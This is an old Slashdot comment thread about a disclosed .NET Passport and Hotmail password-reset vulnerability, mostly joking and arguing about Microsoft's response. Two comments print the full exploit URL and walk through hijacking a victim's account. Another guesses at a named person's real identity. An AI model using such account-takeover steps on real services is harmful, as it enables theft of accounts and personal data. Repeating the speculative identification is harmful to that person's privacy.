Security Vulnerability in Microsoft .NET Passport

Stuart Moore writes "A vulnerability was reported in Microsoft .NET Passport, also affecting Hotmail user accounts. The simple flaw allows an attacker to change any person's password to an arbitrary value. The attacker can then gain access to the victim's accounts, as well as to the victim's personal information (if any is stored w/ Passport). Muhammad Faisal Rauf Danka posted a note to the Full-Disclosure security e-mail list after multiple unsuccessful attempts to contact Microsoft." There's a news report as well.

404 error

[uberdood]

Er, already fixed. I get a 404 error when I go there (with appropriate e-mail addresses).

Re:Remember...

[Anonymous Coward]

according to a dutch news site this hole was fixed shortly after the posting... So thats the way to talk to microsoft.....

nu.nl [nu.nl] for people knowing how to read dutch (no NOT german)..

A legitimate use?

[Gleeb]

Thank the lord for POP ;)

FUD

[Anonymous Coward]

Do stop with the FUD - this has already been fixed. It even says so in the news.com.com.com.com.com article:

"The advisory was posted just before 8 p.m. PDT, and by 11:30 p.m., the software giant had essentially turned off the vulnerable feature. "We have shut down all ability to reset passwords," said Sean Sundwall, spokesman for the company.

May I suggest the headline on the article be changed from "Security Vulnerability in Microsoft .NET Passport" to "Security Vulnerability Fixed"?

Re:Can someone explain this?

[Anonymous Coward]

Nobody seems to know what the hell .Net is all about (including MS).

Lots of people understand what it's about. I use it every single day. Perhaps what you mean is that you don't understand what it's about. In that case, go to http://www.microsoft.com/net/ [microsoft.com] and look around.

What's really scary...

[Anonymous Coward]

... about this is how Microsoft continues to soapbox about how secure M$ products are yet repeatedly ignore those who find holes. This guy sent them several emails about this and they did nothing until they were called out on it. The same thing happened with BO and CdC. They informed M$ of security issues related to "Back Office" and then created Back Orifice as a "See, I told you so", when M$ refused to acknlowledge the problem...

Re:How do you contact Microsoft?

[Anonymous Coward]

Yes, it's called posting on slashdot, silly!

404

[Richard_J_M]

The vulnerability seems to return a 404 - so it seems hotmail have taken notice after all - even though it took a /. to make them notice.

RTFA

[Anonymous Coward]

secure@microsoft.com

Re:Remember...

[m00nun1t]

I fully agree this passport problem is a lame & unexcusable fault that should never, ever have happened.

However, can you please stop dragging trustworthy computing into this? Bill Gates has said many times that the increased focus on security is for new products, not retrospectively fixing existing products.

The only product that is really valid to criticise under the trustworthy computing tag is Windows Server 2003 - if that has big problems, then trustworthy computing has failed. But don't drag up old products/services.

MS-Passport and those that cannot/willnot read

[SgtChaireBourne]

MS-Passport has long been known to be impossible to secure, even in theory: See Risks of the Passport Single Signon Protocol [avirubin.com]. Even the FTC charged Microsoft with deceptive advertising [ftc.gov] in regards to MS-Passport. Other governments are not getting caught with their mouth open either. Standards body forced Redmond to pull 'unsubstantiated and misleading' advertisement [vnunet.com]

There really does seem to be no difference between someone who cannot read and someone who does not. Those that can read wouldn't be caught using MS-Passport. Sadly, signal can be drowned out by noise coming from a colossal marketing blitz [com.com] to last through september.

We'll see if they last [pcmag.com] that long. Windows2003 seems to be more of a push to get users over to OS X or Linux. Their other (2nd of 2) cash cow, the new MS-Office has already been postponed and seems to be more of an incentive to move to OpenOffice than to upgrade.

This is not new

[johnatjohnytech]

This is not a new thing, this has been around for a while.

It is about time somebody tried to bring this to light. But i really doubt he "discovered" something that has been known about for a while.

Don't believe me? Do a search on kazaa for hotmail passwords. You will find several txt/doc's with these or similiar instructions.

What breed of idiot are you?

[gazbo]

So it isn't a standard IIS 404. That is wrong how? Let me put it another way:

lynx -head -source --mime-header 'https://register.passport.net/emailpwdreset.srf?l c=1033&em=victim@hotmail.com&id=&cb=&prefem=attack er@attacker.com&rst=1'

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
Date: Thu, 08 May 2003 13:10:14 GMT
PPServer: H: LAWPPREGU4A002

It's a 404. It returns a 404 code. It says it's a 404 on the page. Just because you understand so little of the HTTP protocol to think that 404 means "displays apache logo" doesn't make MS wrong.

Re:thoughts

[Kredal]

since it's been 404'd, I'll provide it here.

If you went to:

https://register.passport.net/emailpwdreset.srf? lc =1033&em=victim@hotmail.com&id=&cb=&prefem=attacke r@attacker.com&rst=1

and replaced the victim address to a real user, and the attacker@attacker.com to your address, they would send you an email telling you to click on another link, and you could set your own password. Wala, you now have rights to that hotmail account so you can read their mail, look at their buddy list, safely spam people, buy stuff (if they have their credit card saved), etc etc etc... Real fun stuff.

MS announcement

[fudgefactor7]

Passport Security Issue. [microsoft.com] MS was listening, Muhammad Faisal Rauf was just too impatient. Probably just wanted credit as being "kewl," or something.

Re:FUD

[IDIIAMOTS]

As of 6:30AM 5/8/2003 password reset ability works on passport.com.

For non-Hotmail e-mail addresses there exists an option to receive change instructions by e-mail. The URL that's generated on those pages is similar to the one in the exploit, yet entering "attacker" address other than "victim" address doesn't result in an e-mail sent. If the two addresses in the URL match that on the account the e-mail appears to be sent.

Looks like they indeed patched, although there should't be two addresses in the URL or even better, they shouldn't be passing them in URL at all.

8:52am CST - MS turns the vunerability back on.

[louissypher]

Seems someone turned the vunerability back on this morning....neat.

Re:Remember...

[frankthechicken]

I don't know, this [passport.net] still seems to work.

his name is probably

[abhisarda]

Robert Babcock.

Do a search for Ashyukun on google.(www.nhmk.com/nes/ )

also at

(http://216.239.33.104/search?q=cache:q1XY1gcmAY AC :www.animemusicvideos.org/members/linkprobview.php %3Fdownload_id%3D1442+Robert+Babcock+ashyukun&hl=e n&ie=UTF-8).

Consider yourself lucky you don't have to deal with hotmail. Hmm.. what do guys with names like Dick Cheney do?

Re:Can someone explain this?

[Schnapple]

I'm going to use this opportunity to blatantly plug an article [tripod.com] I wrote on this topic on what .NET is and what .NET isn't. And yes that's a Tripod link, so turn on your popup blockers.

But the short answer to your question is that yes, the overkill of .NET branding has muddied and confused the perception of what .NET is. But hey, everyone in the world knows the name, so mission accomplished?

Re:How do you contact Microsoft?

[Quixote]

I don't know about you guys, but I just got this from my buddy Steve Ballmer today:

From SteveBallmer@ceo.microsoft.com Thu May 08 01:26:33 2003
Return-Path: <SteveBallmer@ceo.microsoft.com>
Delivered-To: unknown@somewhere.com
Received: (qmail 8935 invoked from network); 8 May 2003 01:26:32 -0000
Received: from unknown (HELO delivery.pens.microsoft.com) (207.46.248.68)
by xxxxxxxxxxxx with SMTP; 8 May 2003 01:26:12 -0000
Received: from TK2MSFTDDSQ04 ([10.40.1.68]) by delivery.pens.microsoft.com with
Microsoft SMTPSVC(5.0.2195.5600);
Wed, 7 May 2003 18:21:11 -0700
Reply-To: "Steve Ballmer" <GUID-DELETED-@ceo.microsoft.com>
From: "Steve Ballmer" <SteveBallmer@ceo.microsoft.com>
To: <unknown@somewhere.com>
Subject: Rights Management: Enabling New Opportunities for Customers
Date: Wed, 7 May 2003 18:24:10 -0700
Message-ID: <37337373373733737337xxxx@phx.gbl>
MIME-Versio n: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-Mailer: Microsoft CDO for Windows 2000
ontent-Class: urn:content-classes:message
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Return-Path: SteveBallmer@ceo.microsoft.com
X-OriginalArrivalT ime: 08 May 2003 01:20:07.0109 (UTC)
FILETIME=[DEADBEEF:3MTA3]
Status: RO
Content-Length: 11377
Lines: 206

May 7, 2003

I'm writing to you today about a set of emerging technologies that hold great
promise for enhancing privacy and enabling important new uses for computers and other digital devices. Before I share my thoughts about this in more detail, I want to explain why you're receiving this email.

So, in case you guys need to contact Steve, you have his email address now!

Re:Remember...

[Reziac]

Not fixed -- per the articles (which, sadly, I did read) they just shut down the function that allows users to change their password.

YES Re:How do I close a .Net Passport account?

[redwoodtree]

Yes, in fact if you log in and go to your profile, there's a link in the bottom left hand nav that says "CLOSE .NET PASSPORT ACCOUNT"

You click on that, agree to their terms and close your account right there in three clicks.

Goodluck